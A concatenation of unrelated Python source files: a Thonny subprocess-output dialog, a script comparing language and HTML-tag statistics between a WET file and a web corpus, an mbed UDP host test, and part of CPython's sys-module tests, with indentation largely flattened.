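class _ExampleSleepDialog(WorkDialog):
    def get_title(self):
        return "Example work"

    def start_work(self):
        def work():
            for i in range(5):
                time.sleep(0.2)
                self.append_text("step %d\n" % (i + 1))
                self.report_progress(i + 1, 5)
            self.report_done(True)

        threading.Thread(target=work, daemon=True).start()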
class SubprocessDialog(WorkDialog):
"""Shows incrementally the output of given subprocess.
Allows cancelling"""
def __init__(self, master, proc, title, long_description=None, autostart=True):
self._proc = proc
self.stdout = ""
self.stderr = ""
self._stdout_thread = None
self._stderr_thread = None
self._title = title
self._long_description = long_description
self.returncode = None
super().__init__(master, autostart=autostart)
def is_ready_for_work(self):
return True
def get_title(self):
return self._title
def get_instructions(self) -> Optional[str]:
return self._long_description
def start_work(self):
if hasattr(self._proc, "cmd"):
try:
self.append_text(subprocess.list2cmdline(self._proc.cmd) + "\n")
except:
logger.warning("Could not extract cmd (%s)", self._proc.cmd)
self._start_listening_current_proc()
def _start_listening_current_proc(self):
def listen_stream(stream_name):
stream = getattr(self._proc, stream_name)
while True:
data = stream.readline()
self.append_text(data, stream_name)
self._check_set_action_text_from_output_line(data)
if data == "":
logger.debug("Finished reading %s", stream_name)
break
if stream_name == "stdout":
self._finish_process()
logger.debug("Returning from reading %s", stream_name)
self._stdout_thread = threading.Thread(target=listen_stream, args=["stdout"], daemon=True)
self._stdout_thread.start()
if self._proc.stderr is not None:
self._stderr_thread = threading.Thread(
target=listen_stream, args=["stderr"], daemon=True
)
self._stderr_thread.start()
def _finish_process(self):
self.returncode = self._proc.wait()
logger.debug("Process ended with returncode %s", self.returncode)
if self.returncode:
self.set_action_text("Error")
self.append_text("Error: process returned with code %s\n" % self.returncode)
else:
self.set_action_text("Done!")
self.append_text("Done!")
self.report_done(self.returncode == 0)
def get_action_text_max_length(self):
return 35
def _check_set_action_text_from_output_line(self, line):
if len(line) > self.get_action_text_max_length():
line = line[: self.get_action_text_max_length() - 3].strip() + "..."
if line:
self.set_action_text(line.strip())
def cancel_work(self):
super().cancel_work()
# try gently first
try:
try:
if running_on_windows():
os.kill(self._proc.pid, signal.CTRL_BREAK_EVENT) # pylint: disable=no-member
else:
os.kill(self._proc.pid, signal.SIGINT)
self._proc.wait(2)
except subprocess.TimeoutExpired:
if self._proc.poll() is None:
# now let's be more concrete
self._proc.kill()
except OSError as e:
messagebox.showerror("Error", "Could not kill subprocess: " + str(e), master=self)
logger.error("Could not kill subprocess", exc_info=e)
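# Illustrative usage sketch (not part of Thonny): SubprocessDialog expects an
# already-started process with text-mode pipes; the command below is a placeholder.
def _example_open_subprocess_dialog(master):
    import sys  # not imported at module level in this file
    proc = subprocess.Popen(
        [sys.executable, "-c", "print('hello')"],
        stdout=subprocess.PIPE,
        stderr=subprocess.STDOUT,
        universal_newlines=True,
    )
    return SubprocessDialog(master, proc, "Example", autostart=True)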
|
compare.py
|
import argparse
import re
import cld2full as cld
from collections import OrderedDict
import xml.etree.cElementTree as cet
import time
import nltk
html_entities = eval(open("html-entities.lst", "r").read())
def read_document(f, documents):
doc = ""
url = ""
while True:
line = f.readline()
if line == "":
return False
doc += line
if line.startswith("<doc"):
match = re.match(r'<doc (?:\w|\"|\d|=|\s)*url=\"(.+?)\"', line)
url = match.group(1)
elif line.startswith("</doc>"):
break
documents.append((url, doc))
return True
def read_corpus(corpus):
f = open(corpus, "r")
documents = []
hasNext = True
while hasNext:
hasNext = read_document(f, documents)
return sorted(documents, key=lambda k: k[0])
def parse_corpus(corpus):
docs = []
doc = ""
err = 0
for event, elem in cet.iterparse(corpus):
if elem.tag == "metrics":
if not elem.tail == None:
doc += elem.tail
if elem.tag == "doc":
url = elem.attrib['url']
#try:
docs.append((url, doc.encode("utf-8")))
#except:
#err += 1
doc = ""
elem.clear()
print err
return sorted(docs, key=lambda k: k[0])
def read_wet_header_and_skip_info(f):
info = f.readline()
url = ""
length = 0
if info.split()[1] == "warcinfo":
while True:
line = f.readline()
if line.startswith("WARC/1.0"):
return read_wet_header_and_skip_info(f)
else:
url = f.readline().split()[1]
while True:
line = f.readline()
if line.startswith("Content-Length"):
length = int(line.split()[1])
elif not (line.startswith("WARC") or line.startswith("Content")):
return (url, length)
def read_wet_doc(f, documents):
doc = ""
url = ""
while True:
line = f.readline()
if line.startswith("WARC/1.0"):
url, length = read_wet_header_and_skip_info(f)
doc = f.read(length)
documents.append((url, doc))
return True
elif line == "":
return False
return True
def read_wet(wet):
f = open(wet, "r")
documents = []
hasNext = True
while hasNext:
hasNext = read_wet_doc(f, documents)
return sorted(documents, key=lambda k: k[0])
def alt_wet(wet):
    f = open(wet, "r")
    docs = []
    doc = ""
    url = None
    while True:
        line = f.readline()
        if line.startswith("WARC/1.0"):
            # flush the previous record under its own url before the header of
            # the new record is read (otherwise documents get the wrong url)
            if url is not None and not doc.strip() == "":
                docs.append((url, unicode(doc, encoding="utf-8").encode("utf-8")))
            doc = ""
            url, length = read_wet_header_and_skip_info(f)
        elif line == "":
            # flush the final record before returning
            if url is not None and not doc.strip() == "":
                docs.append((url, unicode(doc, encoding="utf-8").encode("utf-8")))
            return sorted(docs, key=lambda k: k[0])
        else:
            doc += line
def add_langs(doc, langs, langdocs, text=True):
success, length, languages = cld.detect(doc, text)
for lang in languages:
name, code, prc, score = lang
langs[name] = langs.get(name, 0.0) + length*prc/100
if prc > 0:
langdocs[name] = langdocs.get(name, 0) + 1
return length
def print_results(distr, cnt):
distr = OrderedDict(sorted(distr.items(), key=lambda t: t[1], reverse=True))
output = [["Language", "Doc #", "Ratio"]]
for entry in distr:
output.append([entry, distr[entry], float(distr[entry])/float(cnt)])
col_width = max(len(str(word)) for row in output for word in row) + 2
result_string = ""
for row in output:
result_string += "".join(str(word).ljust(col_width) for word in row) + "\n"
return result_string
from HTMLParser import HTMLParser
from collections import defaultdict
from multiprocessing import Process, Value, Queue
def find_html_tags(docs, progress, results, tagdicts, avail, num, idx):
tags = defaultdict(int)
entities = defaultdict(int)
ntagdocs = defaultdict(int)
nentitydocs = defaultdict(int)
ntags = {}
nentities = {}
class MyHTMLParser(HTMLParser):
def tag_is_relevant(self, tag):
tags = ['a', 'abbr', 'acronym', 'address', 'applet', 'area',
'aside', 'audio', 'b', 'base', 'basefont', 'bdi',
'bdo', 'big', 'blockquote', 'body', 'br', 'button',
'canvas', 'caption', 'center', 'cite', 'code', 'col',
'colgroup', 'datalist', 'dd', 'del', 'details', 'dfn',
'dialog', 'dir', 'div', 'dl', 'dt', 'em', 'embed',
'fieldset', 'figcaption', 'figure', 'font', 'footer',
'form', 'frame', 'frameset', 'h1', 'h2', 'h3', 'h4', 'h5',
'h6', 'head', 'header', 'hr', 'html', 'i', 'iframe', 'img',
'input', 'ins', 'kbd', 'keygen', 'label', 'legend', 'li',
'link', 'main', 'map', 'mark', 'menu', 'menuitem', 'meta',
'meter', 'nav', 'noframes', 'noscript', 'object', 'ol',
'optgroup', 'option', 'output', 'p', 'param', 'pre', 'progress',
'q', 'rp', 'rt', 'ruby', 's', 'samp', 'script', 'section',
'select', 'small', 'source', 'span', 'strike', 'strong', 'style',
'sub', 'summary', 'sup', 'table', 'tbody', 'td', 'textarea',
'tfoot', 'th', 'thead', 'time', 'title', 'tr', 'track', 'tt',
'u', 'ul', 'var', 'video', 'wbr']
return tag in tags
def entity_is_relevant(self, entity):
global html_entities
return entity in html_entities
def handle_starttag(self, tag, attrs):
if self.tag_is_relevant(tag):
tags[tag] += 1
ntags[0] += 1
def handle_entityref(self, name):
if self.entity_is_relevant(name):
entities[name] += 1
nentities[0] += 1
parser = MyHTMLParser()
local_cnt = 0
cnt = 0
for doc in docs:
ntags[0] = 0
nentities[0] = 0
if local_cnt % 100 == 0:
available = avail.get()
if available > 0 and len(docs)-local_cnt > 150:
results.put((tags, entities))
tagdicts.put((ntagdocs, nentitydocs))
avail.put(available-1)
resultcnt = num.get()
num.put(resultcnt+2)
remaining = docs[local_cnt:]
new_idx1 = str(idx) + "(1)"
new_idx2 = str(idx) + "(2)"
p_one = Process(target=find_html_tags, args=(remaining[0:len(remaining)/2],
progress, results, tagdicts,
avail, num, new_idx1))
p_two = Process(target=find_html_tags, args=(remaining[len(remaining)/2:],
progress, results, tagdicts,
avail, num, new_idx2))
#print "Process finished. Split another in two. avail: ", available, " num: ", resultcnt
p_one.start()
p_two.start()
return tags
avail.put(available)
err = 0
url, txt = doc
try:
parser.feed(txt)
except:
err = 1
ntagdocs[url] = ntags[0]
nentitydocs[url] = nentities[0]
cnt, errs = progress.get()
if cnt % 5000 == 0:
print "cnt, errs:", cnt, errs
#if local_cnt % 5000 == 0:
#print "index, cnt: ", idx, local_cnt
#print "\tremaining: ", len(docs)-local_cnt
cnt += 1
local_cnt += 1
progress.put((cnt, errs+err))
results.put((tags, entities))
tagdicts.put((ntagdocs, nentitydocs))
avail.put(avail.get()+1)
return tags
def merge_results(result):
procs = len(result)
print "Merging results..."
merged = result[0]
for i in xrange(1, procs):
p_res = result[i]
for key, value in p_res.items():
if key not in merged:
merged[key] = p_res[key]
else:
merged[key] = merged[key] + p_res[key]
print "Results merged"
return merged
def merge_dicts(dicts):
merged = dicts[0]
for i in xrange(1, len(dicts)):
for key, value in dicts[i][0].items():
merged[0][key] = value
for key, value in dicts[i][1].items():
merged[1][key] = value
return merged
def calc_std_dev(d):
s = 0.0
count = 0
for key, value in d.items():
s += value
if not value == 0:
count += 1
mean = s/len(d)
diffsum = 0.0
for key, value in d.items():
diff = (value - mean) ** 2
diffsum += diff
variance = diffsum / len(d)
stddev = variance ** (0.5)
return (s, count, mean, stddev)
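# Illustrative usage sketch (not part of the original script): the helper returns
# (total, count of non-zero values, mean, population standard deviation).
def _example_calc_std_dev():
    total, nonzero, mean, stddev = calc_std_dev({"a": 2, "b": 4, "c": 0})
    # total == 6.0, nonzero == 2, mean == 2.0, stddev is roughly 1.63
    return total, nonzero, mean, stddev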
def html_tags_parallell(docs, procs=1):
final_tags = []
final_entities = []
tagsandentities = []
total_length = len(docs)
progress = Queue()
progress.put((0, 0))
results = Queue()
avail = Queue()
tagdicts = Queue()
avail.put(0)
num = Queue()
num.put(procs)
begin = 0
end = len(docs) / procs
idx = 0
print "Started threads"
for i in xrange(procs):
idx += 1
p_docs = docs[begin:end]
p = Process(target=find_html_tags, args=(p_docs, progress,
results, tagdicts, avail,
num, idx))
p.start()
begin = end
end = end + len(docs) / procs
if i == procs - 2:
end = len(docs)
while True:
prog, errs = progress.get()
if prog == total_length:
break
progress.put((prog, errs))
number = num.get()
for i in xrange(number):
tags, entities = results.get()
final_tags.append(tags)
final_entities.append(entities)
tagsandentities.append(tagdicts.get())
print "THREADS MERGED"
merged_tags = merge_results(final_tags)
merged_entities = merge_results(final_entities)
m_dicts = merge_dicts(tagsandentities)
ntagdocs, nentitydocs = m_dicts
return (merged_tags, merged_entities, ntagdocs, nentitydocs)
def format_parse_result(html, headline):
s = 0.0
for key, value in html.items():
s += value
distr = OrderedDict(sorted(html.items(), key=lambda t: t[1], reverse=True))
output = [[headline, "Doc #", "Ratio"]]
for entry in distr:
output.append([entry, html[entry], float(html[entry])/float(s)])
col_width = max(len(str(word)) for row in output for word in row) + 2
result_string = ""
for row in output:
result_string += "".join(str(word).ljust(col_width) for word in row) + "\n"
return result_string
def output_parse_result(html, distr, headline, out):
result_string = format_parse_result(html, headline)
sum, count, mean, stddev = calc_std_dev(distr)
o = open(out, "w+")
o.write(result_string)
o.write("\n\n")
o.write("Total no. of " + headline + ": " + str(sum) + "\n")
o.write("Number of documents with " + headline + "s: " + str(count))
o.write("Average per document: " + str(mean)+ "\n")
o.write("Standard deviation: " + str(stddev) + "\n")
o.close()
def get_intersection(corpus, wet):
i = 0
j = 0
similar = []
while i < len(corpus) and j < len(wet):
corpurl = corpus[i][0].strip()
weturl = wet[j][0].strip()
        if corpurl == weturl:
            # record the matching WET document before advancing past it
            similar.append(wet[j])
            i += 1
            j += 1
elif corpurl > weturl:
j += 1
elif corpurl < weturl:
i += 1
return similar
def perform_lang_id(docs, o, dtype):
langs = {}
langdocs = {}
errors = 0
total_length = 0
for doc in docs:
try:
total_length += add_langs(doc[1], langs, langdocs, text=True)
except:
errors += 1
print "Counted language distribution of", len(docs), dtype
o.write(dtype + ": " +str(len(docs))+"\n")
o.write("# UTF-8 Errors: "+str(errors)+"\n")
o.write(print_results(langs, total_length)+"\n")
o.write("\n"+"How many docs was language l seen in?:\n")
s = 0
for key, value in langdocs.items():
s += value
o.write(print_results(langdocs, s))
o.write("\n\n")
def count_langs_write_to_file(corpus_documents, wet_documents, intersection, output):
o = open(output, "w+")
perform_lang_id(corpus_documents, o, "texrex documents")
perform_lang_id(wet_documents, o, "WET documents")
perform_lang_id(intersection, o, "documents from WET that is also in texrex")
o.close()
def count_tokens(docs, dtype, o):
tokens = {}
errors = 0
cnt = 0
for url, doc in docs:
try:
tokens[url] = len(nltk.word_tokenize(doc))
except:
errors += 1
sum, count, mean, stddev = calc_std_dev(tokens)
o.write(dtype + " tokens:\n")
o.write("total amount: " + str(sum) + "\n")
o.write("average per doc: " + str(mean) + "\n")
o.write("standard deviation: " + str(stddev) + "\n")
o.write("Encoding errors: " + str(errors) + "\n")
def write_token_amount_to_file(corpus_documents, wet_documents, intersection, output):
o = open("token_"+output, "w+")
count_tokens(corpus_documents, "texrex documents", o)
count_tokens(wet_documents, "WET documents", o)
count_tokens(intersection, "documents from WET that is also in texrex", o)
def perform_count_and_output(docs, processes, outputfilename):
tags, entities, tag_distr, entity_distr = html_tags_parallell(docs, procs=processes)
output_parse_result(tags, tag_distr, "Tag", "tag_"+outputfilename)
output_parse_result(entities, entity_distr, "Entity", "entity_"+outputfilename)
def compare(wet, corpus, output, procs):
corpus_docs = parse_corpus(corpus)
print "Read corpus"
wet_documents = alt_wet(wet)
print "Read WET file"
wet_intersection = get_intersection(corpus_docs, wet_documents)
wet_out = "wet_" + output
intersection_out = "intersection_wet_" + output
tex_out = "texrex_" + output
perform_count_and_output(wet_documents, procs, wet_out)
perform_count_and_output(corpus_docs, procs, tex_out)
perform_count_and_output(wet_intersection, procs, intersection_out)
count_langs_write_to_file(corpus_docs, wet_documents, wet_intersection, "lang_"+output)
write_token_amount_to_file(corpus_docs, wet_documents, wet_intersection, output)
def main():
parser = argparse.ArgumentParser(description="Compare a WET file and a corpus created from the corresponding WARC file")
parser.add_argument("wet", help="the WET file to read")
parser.add_argument("corpus", help="the corpus file to be read")
parser.add_argument("--output", "-o", help="a filename for the different output stats files", default="compare.out")
parser.add_argument("--procs", "-p", help="how many processors can be run in parallel", default=12)
args = parser.parse_args()
compare(args.wet, args.corpus, args.output, args.procs)
if __name__ == "__main__":
main()
|
udp_shotgun.py
|
"""
mbed SDK
Copyright (c) 2011-2013 ARM Limited
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import sys
import socket
import json
import random
import itertools
import time
from sys import stdout
from threading import Thread
from SocketServer import BaseRequestHandler, UDPServer
from mbed_host_tests import BaseHostTest, event_callback
class UDPEchoClientHandler(BaseRequestHandler):
def handle(self):
""" UDP packet handler. Responds with multiple simultaneous packets
"""
data, sock = self.request
pattern = [ord(d) << 4 for d in data]
# Each byte in request indicates size of packet to receive
# Each packet size is shifted over by 4 to fit in a byte, which
# avoids any issues with endianess or decoding
for packet in pattern:
data = [random.randint(0, 255) for _ in range(packet-1)]
data.append(reduce(lambda a,b: a^b, data))
data = ''.join(map(chr, data))
sock.sendto(data, self.client_address)
# Sleep a tiny bit to compensate for local network
time.sleep(0.01)
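# Illustrative helper (not part of the original host test): shows how a client
# could check one reply against the convention used above -- the final byte of
# each packet is the XOR of all preceding payload bytes.
def _example_verify_reply(data):
    payload, checksum = data[:-1], data[-1]
    xor = 0
    for ch in payload:
        xor ^= ord(ch)
    return xor == ord(checksum)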
class UDPEchoClientTest(BaseHostTest):
def __init__(self):
"""
Initialise test parameters.
:return:
"""
BaseHostTest.__init__(self)
self.SERVER_IP = None # Will be determined after knowing the target IP
        self.SERVER_PORT = 0  # Let UDPServer choose an arbitrary port
self.server = None
self.server_thread = None
self.target_ip = None
@staticmethod
def find_interface_to_target_addr(target_ip):
"""
Finds IP address of the interface through which it is connected to the target.
:return:
"""
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
try:
s.connect((target_ip, 0)) # Target IP, any port
except socket.error:
s.connect((target_ip, 8000)) # Target IP, 'random' port
ip = s.getsockname()[0]
s.close()
return ip
def setup_udp_server(self):
"""
sets up a UDP server for target to connect and send test data.
:return:
"""
        # !NOTE: There should be a mechanism to assert in the host test
if self.SERVER_IP is None:
self.log("setup_udp_server() called before determining server IP!")
self.notify_complete(False)
# Returning none will suppress host test from printing success code
self.server = UDPServer((self.SERVER_IP, self.SERVER_PORT), UDPEchoClientHandler)
ip, port = self.server.server_address
self.SERVER_PORT = port
self.server.allow_reuse_address = True
self.log("HOST: Listening for UDP packets: " + self.SERVER_IP + ":" + str(self.SERVER_PORT))
self.server_thread = Thread(target=UDPEchoClientTest.server_thread_func, args=(self,))
self.server_thread.start()
@staticmethod
def server_thread_func(this):
"""
        Thread function to run the UDP server forever.
:param this:
:return:
"""
this.server.serve_forever()
@event_callback("target_ip")
def _callback_target_ip(self, key, value, timestamp):
"""
Callback to handle reception of target's IP address.
:param key:
:param value:
:param timestamp:
:return:
"""
self.target_ip = value
self.SERVER_IP = self.find_interface_to_target_addr(self.target_ip)
self.setup_udp_server()
@event_callback("host_ip")
def _callback_host_ip(self, key, value, timestamp):
"""
Callback for request for host IP Addr
"""
self.send_kv("host_ip", self.SERVER_IP)
@event_callback("host_port")
def _callback_host_port(self, key, value, timestamp):
"""
Callback for request for host port
"""
self.send_kv("host_port", self.SERVER_PORT)
def teardown(self):
if self.server:
self.server.shutdown()
self.server_thread.join()
|
test_sys.py
|
# -*- coding: iso-8859-1 -*-
import unittest, test.test_support
import sys, cStringIO, os
import struct
try:
import _llvm
except ImportError:
WITH_LLVM = False
else:
WITH_LLVM = True
del _llvm
class SysModuleTest(unittest.TestCase):
def test_original_displayhook(self):
import __builtin__
savestdout = sys.stdout
out = cStringIO.StringIO()
sys.stdout = out
dh = sys.__displayhook__
self.assertRaises(TypeError, dh)
if hasattr(__builtin__, "_"):
del __builtin__._
dh(None)
self.assertEqual(out.getvalue(), "")
self.assert_(not hasattr(__builtin__, "_"))
dh(42)
self.assertEqual(out.getvalue(), "42\n")
self.assertEqual(__builtin__._, 42)
del sys.stdout
self.assertRaises(RuntimeError, dh, 42)
sys.stdout = savestdout
def test_lost_displayhook(self):
olddisplayhook = sys.displayhook
del sys.displayhook
code = compile("42", "<string>", "single")
self.assertRaises(RuntimeError, eval, code)
sys.displayhook = olddisplayhook
def test_custom_displayhook(self):
olddisplayhook = sys.displayhook
def baddisplayhook(obj):
raise ValueError
sys.displayhook = baddisplayhook
code = compile("42", "<string>", "single")
self.assertRaises(ValueError, eval, code)
sys.displayhook = olddisplayhook
def test_original_excepthook(self):
savestderr = sys.stderr
err = cStringIO.StringIO()
sys.stderr = err
eh = sys.__excepthook__
self.assertRaises(TypeError, eh)
try:
raise ValueError(42)
except ValueError, exc:
eh(*sys.exc_info())
sys.stderr = savestderr
self.assert_(err.getvalue().endswith("ValueError: 42\n"))
# FIXME: testing the code for a lost or replaced excepthook in
# Python/pythonrun.c::PyErr_PrintEx() is tricky.
def test_exc_clear(self):
self.assertRaises(TypeError, sys.exc_clear, 42)
# Verify that exc_info is present and matches exc, then clear it, and
# check that it worked.
def clear_check(exc):
typ, value, traceback = sys.exc_info()
self.assert_(typ is not None)
self.assert_(value is exc)
self.assert_(traceback is not None)
sys.exc_clear()
typ, value, traceback = sys.exc_info()
self.assert_(typ is None)
self.assert_(value is None)
self.assert_(traceback is None)
def clear():
try:
raise ValueError, 42
except ValueError, exc:
clear_check(exc)
# Raise an exception and check that it can be cleared
clear()
# Verify that a frame currently handling an exception is
# unaffected by calling exc_clear in a nested frame.
try:
raise ValueError, 13
except ValueError, exc:
typ1, value1, traceback1 = sys.exc_info()
clear()
typ2, value2, traceback2 = sys.exc_info()
self.assert_(typ1 is typ2)
self.assert_(value1 is exc)
self.assert_(value1 is value2)
self.assert_(traceback1 is traceback2)
# Check that an exception can be cleared outside of an except block
clear_check(exc)
def test_exit(self):
self.assertRaises(TypeError, sys.exit, 42, 42)
# call without argument
try:
sys.exit(0)
except SystemExit, exc:
self.assertEquals(exc.code, 0)
except:
self.fail("wrong exception")
else:
self.fail("no exception")
        # call with integer argument
try:
sys.exit(42)
except SystemExit, exc:
self.assertEquals(exc.code, 42)
except:
self.fail("wrong exception")
else:
self.fail("no exception")
        # call with tuple argument with one entry
        # entry will be unpacked
try:
sys.exit((42,))
except SystemExit, exc:
self.assertEquals(exc.code, 42)
except:
self.fail("wrong exception")
else:
self.fail("no exception")
# call with string argument
try:
sys.exit("exit")
except SystemExit, exc:
self.assertEquals(exc.code, "exit")
except:
self.fail("wrong exception")
else:
self.fail("no exception")
# call with tuple argument with two entries
try:
sys.exit((17, 23))
except SystemExit, exc:
self.assertEquals(exc.code, (17, 23))
except:
self.fail("wrong exception")
else:
self.fail("no exception")
# test that the exit machinery handles SystemExits properly
import subprocess
# both unnormalized...
rc = subprocess.call([sys.executable, "-c",
"raise SystemExit, 46"])
self.assertEqual(rc, 46)
# ... and normalized
rc = subprocess.call([sys.executable, "-c",
"raise SystemExit(47)"])
self.assertEqual(rc, 47)
def test_getdefaultencoding(self):
if test.test_support.have_unicode:
self.assertRaises(TypeError, sys.getdefaultencoding, 42)
# can't check more than the type, as the user might have changed it
self.assert_(isinstance(sys.getdefaultencoding(), str))
# testing sys.settrace() is done in test_trace.py
# testing sys.setprofile() is done in test_profile.py
def test_setcheckinterval(self):
self.assertRaises(TypeError, sys.setcheckinterval)
orig = sys.getcheckinterval()
for n in 0, 100, 120, orig: # orig last to restore starting state
sys.setcheckinterval(n)
self.assertEquals(sys.getcheckinterval(), n)
def test_recursionlimit(self):
self.assertRaises(TypeError, sys.getrecursionlimit, 42)
oldlimit = sys.getrecursionlimit()
self.assertRaises(TypeError, sys.setrecursionlimit)
self.assertRaises(ValueError, sys.setrecursionlimit, -42)
sys.setrecursionlimit(10000)
self.assertEqual(sys.getrecursionlimit(), 10000)
sys.setrecursionlimit(oldlimit)
def test_getwindowsversion(self):
if hasattr(sys, "getwindowsversion"):
v = sys.getwindowsversion()
self.assert_(isinstance(v, tuple))
self.assertEqual(len(v), 5)
self.assert_(isinstance(v[0], int))
self.assert_(isinstance(v[1], int))
self.assert_(isinstance(v[2], int))
self.assert_(isinstance(v[3], int))
self.assert_(isinstance(v[4], str))
def test_dlopenflags(self):
if hasattr(sys, "setdlopenflags"):
self.assert_(hasattr(sys, "getdlopenflags"))
self.assertRaises(TypeError, sys.getdlopenflags, 42)
oldflags = sys.getdlopenflags()
self.assertRaises(TypeError, sys.setdlopenflags)
sys.setdlopenflags(oldflags+1)
self.assertEqual(sys.getdlopenflags(), oldflags+1)
sys.setdlopenflags(oldflags)
def test_refcount(self):
self.assertRaises(TypeError, sys.getrefcount)
c = sys.getrefcount(None)
n = None
self.assertEqual(sys.getrefcount(None), c+1)
del n
self.assertEqual(sys.getrefcount(None), c)
if hasattr(sys, "gettotalrefcount"):
self.assert_(isinstance(sys.gettotalrefcount(), int))
def test_getframe(self):
self.assertRaises(TypeError, sys._getframe, 42, 42)
self.assertRaises(ValueError, sys._getframe, 2000000000)
self.assert_(
SysModuleTest.test_getframe.im_func.func_code \
is sys._getframe().f_code
)
# sys._current_frames() is a CPython-only gimmick.
def test_current_frames(self):
have_threads = True
try:
import thread
except ImportError:
have_threads = False
if have_threads:
self.current_frames_with_threads()
else:
self.current_frames_without_threads()
# Test sys._current_frames() in a WITH_THREADS build.
def current_frames_with_threads(self):
import threading, thread
import traceback
# Spawn a thread that blocks at a known place. Then the main
# thread does sys._current_frames(), and verifies that the frames
# returned make sense.
entered_g = threading.Event()
leave_g = threading.Event()
thread_info = [] # the thread's id
def f123():
g456()
def g456():
thread_info.append(thread.get_ident())
entered_g.set()
leave_g.wait()
t = threading.Thread(target=f123)
t.start()
entered_g.wait()
# At this point, t has finished its entered_g.set(), although it's
# impossible to guess whether it's still on that line or has moved on
# to its leave_g.wait().
self.assertEqual(len(thread_info), 1)
thread_id = thread_info[0]
d = sys._current_frames()
main_id = thread.get_ident()
self.assert_(main_id in d)
self.assert_(thread_id in d)
# Verify that the captured main-thread frame is _this_ frame.
frame = d.pop(main_id)
self.assert_(frame is sys._getframe())
# Verify that the captured thread frame is blocked in g456, called
        # from f123. This is a little tricky, since various bits of
# threading.py are also in the thread's call stack.
frame = d.pop(thread_id)
stack = traceback.extract_stack(frame)
for i, (filename, lineno, funcname, sourceline) in enumerate(stack):
if funcname == "f123":
break
else:
self.fail("didn't find f123() on thread's call stack")
self.assertEqual(sourceline, "g456()")
# And the next record must be for g456().
filename, lineno, funcname, sourceline = stack[i+1]
self.assertEqual(funcname, "g456")
self.assert_(sourceline in ["leave_g.wait()", "entered_g.set()"])
# Reap the spawned thread.
leave_g.set()
t.join()
# Test sys._current_frames() when thread support doesn't exist.
def current_frames_without_threads(self):
# Not much happens here: there is only one thread, with artificial
# "thread id" 0.
d = sys._current_frames()
self.assertEqual(len(d), 1)
self.assert_(0 in d)
self.assert_(d[0] is sys._getframe())
def test_attributes(self):
self.assert_(isinstance(sys.api_version, int))
self.assert_(isinstance(sys.argv, list))
self.assert_(sys.byteorder in ("little", "big"))
self.assert_(isinstance(sys.builtin_module_names, tuple))
self.assert_(isinstance(sys.copyright, basestring))
self.assert_(isinstance(sys.exec_prefix, basestring))
self.assert_(isinstance(sys.executable, basestring))
self.assertEqual(len(sys.float_info), 11)
self.assertEqual(sys.float_info.radix, 2)
self.assert_(isinstance(sys.hexversion, int))
self.assert_(isinstance(sys.maxint, int))
if test.test_support.have_unicode:
self.assert_(isinstance(sys.maxunicode, int))
self.assert_(isinstance(sys.platform, basestring))
self.assert_(isinstance(sys.prefix, basestring))
self.assert_(isinstance(sys.version, basestring))
vi = sys.version_info
self.assert_(isinstance(vi, tuple))
self.assertEqual(len(vi), 5)
self.assert_(isinstance(vi[0], int))
self.assert_(isinstance(vi[1], int))
self.assert_(isinstance(vi[2], int))
self.assert_(vi[3] in ("alpha", "beta", "candidate", "final"))
self.assert_(isinstance(vi[4], int))
def test_43581(self):
# Can't use sys.stdout, as this is a cStringIO object when
# the test runs under regrtest.
self.assert_(sys.__stdout__.encoding == sys.__stderr__.encoding)
def test_sys_flags(self):
self.failUnless(sys.flags)
attrs = ("debug", "py3k_warning", "division_warning", "division_new",
"inspect", "interactive", "optimize", "dont_write_bytecode",
"no_site", "ignore_environment", "tabcheck", "verbose",
"unicode", "bytes_warning")
for attr in attrs:
self.assert_(hasattr(sys.flags, attr), attr)
self.assertEqual(type(getattr(sys.flags, attr)), int, attr)
self.assert_(hasattr(sys.flags, "jit_control"))
self.assert_(repr(sys.flags))
def test_clear_type_cache(self):
sys._clear_type_cache()
def test_ioencoding(self):
import subprocess,os
env = dict(os.environ)
# Test character: cent sign, encoded as 0x4A (ASCII J) in CP424,
# not representable in ASCII.
env["PYTHONIOENCODING"] = "cp424"
p = subprocess.Popen([sys.executable, "-c", 'print unichr(0xa2)'],
stdout = subprocess.PIPE, env=env)
out = p.stdout.read().strip()
self.assertEqual(out, unichr(0xa2).encode("cp424"))
env["PYTHONIOENCODING"] = "ascii:replace"
p = subprocess.Popen([sys.executable, "-c", 'print unichr(0xa2)'],
stdout = subprocess.PIPE, env=env)
out = p.stdout.read().strip()
self.assertEqual(out, '?')
if hasattr(sys, "setbailerror"):
def test_bailerror(self):
# sys.setbailerror() is used to raise an exception when native code
# bails to the interpreter. This is useful for testing native code
# generation/execution. configuring with --with-llvm is required
# to get sys.{set,get}bailerror().
tracer = sys.gettrace()
bail = sys.getbailerror()
def foo():
sys.settrace(lambda *args: None)
def bar():
sys.setbailerror(True)
foo()
return 7
bar.__code__.co_optimization = 2
bar.__code__.__use_llvm__ = True
def run_test():
try:
bar()
except RuntimeError:
pass
else:
self.fail("Failed to raise RuntimeError")
finally:
sys.settrace(tracer)
sys.setbailerror(bail)
# Force use of the interpreter; otherwise we can't catch the
# RuntimeError if run with -j always (line tracing triggers on the
# except, raising another RuntimeError).
run_test.__code__.__use_llvm__ = False
run_test()
class SizeofTest(unittest.TestCase):
TPFLAGS_HAVE_GC = 1<<14
TPFLAGS_HEAPTYPE = 1L<<9
def setUp(self):
self.c = len(struct.pack('c', ' '))
self.H = len(struct.pack('H', 0))
self.i = len(struct.pack('i', 0))
self.l = len(struct.pack('l', 0))
self.P = len(struct.pack('P', 0))
# due to missing size_t information from struct, it is assumed that
# sizeof(Py_ssize_t) = sizeof(void*)
self.header = 'PP'
self.vheader = self.header + 'P'
if hasattr(sys, "gettotalrefcount"):
self.header += '2P'
self.vheader += '2P'
import _testcapi
self.gc_headsize = _testcapi.SIZEOF_PYGC_HEAD
self.file = open(test.test_support.TESTFN, 'wb')
def tearDown(self):
self.file.close()
test.test_support.unlink(test.test_support.TESTFN)
def check_sizeof(self, o, size):
result = sys.getsizeof(o)
if ((type(o) == type) and (o.__flags__ & self.TPFLAGS_HEAPTYPE) or\
((type(o) != type) and (type(o).__flags__ & self.TPFLAGS_HAVE_GC))):
size += self.gc_headsize
msg = 'wrong size for %s: got %d, expected %d' \
% (type(o), result, size)
self.assertEqual(result, size, msg)
def calcsize(self, fmt):
